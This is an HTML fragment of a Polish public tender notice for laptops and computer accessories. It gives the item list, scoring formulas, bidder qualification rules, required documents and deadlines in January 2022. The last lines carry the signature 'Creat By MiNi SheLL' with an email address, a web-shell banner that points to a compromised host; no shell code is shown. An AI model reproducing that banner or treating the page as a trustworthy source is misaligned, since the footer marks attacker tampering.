Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa laptopów i akcesoriów komputerowych, w tym:<br/>1)	Laptop nr 1 – 9 szt.<br/>2)	Laptop nr 2 – 1 szt.<br/>3)	Laptop nr 3 – 1 szt.<br/>4)	Tablet nr 1 – 2 szt.<br/>5)	Dysk przenośny – 14 szt.<br/>6)	Dysk twardy SSD nr 1 - 500GB – 31 szt.<br/>7)	Dysk twardy SSD nr 2 - 250GB – 42 szt.<br/>8)	Dysk twardy SSD nr 3 - 1TB – 5 szt.<br/>9)	Głośniki przenośne – 6 szt.<br/>10)	Karta graficzna – 16 szt.<br/>11)	Karta sieciowa – 15 szt.<br/>12)	Karta sieciowa WIFI – 5 szt.<br/>13)	Klawiatura – 40 szt. <br/>14)	Klawiatura bezprzewodowa – 4 szt. <br/>15)	Mysz – 85 szt.<br/>16)	Mysz bezprzewodowa – 21 szt.<br/>17)	Pen-Drive nr 1 – 30 szt.<br/>18)	Pen-Drive nr 2 – 14 szt.<br/>19)	Czytnik do kart chipowych – 3 szt.<br/>20)	Nagrywarka zewnętrzna DVD – 4 szt.<br/>21)	Kabel HDMI 20m – 10 szt.<br/>22)	Kabel HDMI 10m – 3 szt.<br/>23)	Kabel HDMI 3m – 10 szt.<br/>24)	Kabel USB 2.0 – 5 szt.<br/>25)	Kabel USB nr 1 do drukarki – 5 szt. <br/>26)	Kabel USB nr 2 do drukarki 2 – 10 szt.<br/>27)	Słuchawki – 18 szt.<br/>28)	Kamera internetowa – 14 szt.<br/>29)	Switch – 15 szt.<br/>30)	Router WiFi – 13 szt.<br/>31)	Tablet graficzny – 2 szt.<br/>32)	Torba do laptopa 15,6&#34; – 14 szt.<br/>33)	Torba do laptopa 14,1&#34; – 1 szt.<br/>34)	Procesor – 10 szt. <br/>35)	Płyta główna – 10 szt. <br/>36)	Pamięć RAM – 10 szt.<br/>37)	Adapter HDMI VGA – 8 szt.<br/>38)	Adapter HDMI DisplayPort – 7 szt.<br/>39)	Czytnik e-booków – 1 szt.<br/>40)	Przedłużacz aktywny USB – 1 szt.<br/>41)	Tablet graficzny z wbudowanym wyświetlaczem (ekran piórkowy) – 1 szt.<br/>Szczegółowy opis zamówienia określa załącznik nr 3D do SWZ.<br/>Minimalny okres gwarancji na przedmiot zamówienia – 24 miesiące. Okres gwarancji stanowi kryterium oceny ofert. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował następującymi kryteriami oceny ofert:<br/> 1. Cena	60%<br/> 2. Okres gwarancji	20%<br/> 3. Termin realizacji	20%<br/><br/>2.	Punkty przyznawane za kryteria podane w pkt 1 będą liczone według następujących wzorów:<br/><br/> 1.	Cena:	Punkty w kryterium oceny ofert – 60% (60 pkt)<br/>Liczba punktów = (Cmin/Cof) * Wc * 100, gdzie:<br/>Cmin – najniższa cena zł brutto spośród wszystkich ofert<br/>Cof – cena zł brutto podana w badanej ofercie <br/>Wc – waga kryterium cena<br/><br/> 2.	Okres gwarancji	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Gof-Gmin)/(Gmax-Gmin)) * Wg * 100, gdzie:<br/>	Gmin – minimalny okres gwarancji, który jest wymagany od każdego Wykonawcy (24 miesiące)<br/>	Gmax – maksymalny okres gwarancji (36 miesięcy)<br/>	Gof – okres gwarancji podany w badanej ofercie (liczba miesięcy)<br/>	Wg – waga kryterium okres gwarancji<br/><br/> 3.	Termin realizacji:	Punkty w kryterium oceny ofert – 20% (20 pkt)<br/>	Liczba punktów = ((Tmax-Tof)/(Tmax-Tmin)) * Wt * 100, gdzie:<br/>	Tmin – minimalny punktowany termin realizacji (28 dni) <br/>	Tmax – maksymalny termin realizacji (42 dni)<br/>	Tof – termin realizacji podany w badanej ofercie (liczba dni)<br/>	Wt – waga kryterium termin realizacji<br/>	Uwaga! W przypadku zaproponowania przez Wykonawcę terminu realizacji krótszego niż 28 dni, do badania ofert zostanie przyjęty Tof=Tmin=28 dni<br/><br/>Uwaga! Oferowany okres gwarancji/termin realizacji należy wskazać w formularzu oferty stanowiącym załącznik nr 1 do SWZ. W przypadku braku wskazania okresu gwarancji/terminu realizacji, Zamawiający przyzna Wykonawcy 0 pkt jako zaoferowanie najkrótszego okresu gwarancji/najdłuższego terminu realizacji.<br/><br/>3.	Po dokonaniu ocen w danej części, punkty przyznane w ramach każdego z kryteriów dotyczących tej części zostaną zsumowane. Suma punktów uzyskanych za wszystkie kryteria oceny w danej części zamówienia stanowić będzie końcową ocenę oferty w tej części.<br/>4.	Wszystkie obliczenia punktów będą dokonywane z dokładnością do dwóch miejsc po przecinku (bez zaokrągleń).<br/>5.	Za ofertę najwyżej ocenioną w danej części zamówienia zostanie uznana oferta, która otrzyma największą liczbę punktów w tej części.<br/>6.	Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia w części 1 mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu: Zdolność do występowania w obrocie gospodarczym: Zamawiający nie wyznacza warunku w tym zakresie. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza warunku w tym zakresie. Sytuacja ekonomiczna lub finansowa: Zamawiający nie wyznacza warunku w tym zakresie. Zdolność techniczna i zawodowa: Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną dostawę urządzeń zgodnych z przedmiotem zamówienia w części 1 o wartości nie niższej niż 50 000 zł brutto.<br/><br/>O udzielenie zamówienia w części 2 mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu: Zdolność do występowania w obrocie gospodarczym: Zamawiający nie wyznacza warunku w tym zakresie. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza warunku w tym zakresie. Sytuacja ekonomiczna lub finansowa: Zamawiający nie wyznacza warunku w tym zakresie. Zdolność techniczna i zawodowa: Zamawiający nie wyznacza warunku w tym zakresie.<br/><br/>O udzielenie zamówienia w części 3 mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu: Zdolność do występowania w obrocie gospodarczym: Zamawiający nie wyznacza warunku w tym zakresie. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza warunku w tym zakresie. Sytuacja ekonomiczna lub finansowa: Zamawiający nie wyznacza warunku w tym zakresie. Zdolność techniczna i zawodowa: Zamawiający nie wyznacza warunku w tym zakresie.<br/><br/>O udzielenie zamówienia w części 4 mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu: Zdolność do występowania w obrocie gospodarczym: Zamawiający nie wyznacza warunku w tym zakresie. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza warunku w tym zakresie. Sytuacja ekonomiczna lub finansowa: Zamawiający nie wyznacza warunku w tym zakresie. Zdolność techniczna i zawodowa: Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną dostawę urządzeń zgodnych z przedmiotem zamówienia w części 4 o wartości nie niższej niż 50 000 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu - Załącznik nr 10 do SWZ (dotyczy wszystkich części).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu dat wykonania oraz podmiotów na rzecz których dostawy te zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - Załącznik nr 7 do SWZ (dotyczy części 1 oraz części 4).<br/>Uwaga! Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi Wykonawcami, wykaz dostaw dotyczy tych dostaw, które Wykonawca ten bezpośrednio wykonał.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>a)	w części 1, części 2, części 3, części 4: <br/>-	opis techniczny oferowanego sprzętu wraz ze wskazaniem wszystkich parametrów technicznych w zakresie umożliwiającym ocenę spełniania wymagań Zamawiającego określonych w SWZ, z zaznaczeniem, której pozycji dotyczy opis,<br/>b)	w części 1:<br/>-	wydruki wyniku testu PassMark CPU Mark ze strony: http://www.cpubenchmark.net potwierdzające spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 1, 2, 3, ze wskazaniem której pozycji dotyczą wydruki, <br/>-	wydruk wyniku testu Passmark G3D Mark ze strony: http://www.videocardbenchmark.net potwierdzającego spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 3, ze wskazaniem której pozycji dotyczy wydruk.<br/>c)	w części 4:<br/>-	wydruki wyniku testu PassMark CPU Mark ze strony: http://www.cpubenchmark.net potwierdzające spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 1, 2, 3, 34, ze wskazaniem której pozycji dotyczy wydruk,<br/>-	wydruki wyniku testu Passmark G3D Mark ze strony: http://www.videocardbenchmark.net potwierdzającego spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 2, 10, ze wskazaniem której pozycji dotyczą wydruki. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a)	w części 1, części 2, części 3, części 4: <br/>-	opis techniczny oferowanego sprzętu wraz ze wskazaniem wszystkich parametrów technicznych w zakresie umożliwiającym ocenę spełniania wymagań Zamawiającego określonych w SWZ, z zaznaczeniem, której pozycji dotyczy opis,<br/>b)	w części 1:<br/>-	wydruki wyniku testu PassMark CPU Mark ze strony: http://www.cpubenchmark.net potwierdzające spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 1, 2, 3, ze wskazaniem której pozycji dotyczą wydruki, <br/>-	wydruk wyniku testu Passmark G3D Mark ze strony: http://www.videocardbenchmark.net potwierdzającego spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 3, ze wskazaniem której pozycji dotyczy wydruk.<br/>c)	w części 4:<br/>-	wydruki wyniku testu PassMark CPU Mark ze strony: http://www.cpubenchmark.net potwierdzające spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 1, 2, 3, 34, ze wskazaniem której pozycji dotyczy wydruk,<br/>-	wydruki wyniku testu Passmark G3D Mark ze strony: http://www.videocardbenchmark.net potwierdzającego spełnienie wymagań określonych w opisie przedmiotu zamówienia dla pozycji nr 2, 10, ze wskazaniem której pozycji dotyczą wydruki. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W szczególności oferta winna zawierać wypełniony i podpisany formularz oferty stanowiący załącznik nr 1 do SWZ wraz z następującymi załącznikami (wypełnionymi i uzupełnionymi lub sporządzonymi zgodnie z ich treścią):<br/>1)	przedmiotowe środki dowodowe,<br/>2)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców – załącznik nr 4 do SWZ,<br/>3)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – załącznik nr 5 do SWZ,<br/>4)	oświadczenie o zakresie wykonania zamówienia przez poszczególnych wykonawców wspólnie ubiegających się o zamówienie (o ile dotyczy) – załącznik nr 6 do SWZ,<br/>5)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy (o ile dotyczy),<br/>6)	zobowiązanie podmiotu udostępniającego zasoby Wykonawcy (o ile dotyczy) – załącznik nr 8 do SWZ ,<br/>7)	oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (o ile dotyczy) - Załącznik nr 9 SWZ,<br/>8)	pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się o zamówienia – konsorcja, spółki cywilne), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Rozdział 10. SWZ:<br/>1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (wspólnicy spółki cywilnej/ konsorcjum) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do oferty.<br/>2.	W toku prowadzonego postępowania komunikacja pomiędzy zamawiającym a wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia następować będzie za pośrednictwem lidera (pełnomocnika) o którym mowa w ust. 1.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, każdy z wykonawców wraz z ofertą składa oświadczenie o niepodleganiu wykluczeniu - Załącznik nr 4 do SWZ.<br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, każdy z wykonawców zobowiązany jest do złożenia wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu – Załącznik nr 5 do SWZ.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie o zakresie wykonania zamówienia przez wykonawców wspólnie ubiegających się o udzielenie zamówienia – Załącznik nr 6 do SWZ.<br/>6.	Wszyscy wykonawcy składający wspólną ofertę będą ponosić odpowiedzialność solidarną za wykonanie umowy. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy od wszystkich wykonawców łącznie lub od każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany postanowień zawartej umowy zgodnie z przesłankami określonymi w Projektowanych Postanowieniach Umowy - załącznik nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">a)	Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-14 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com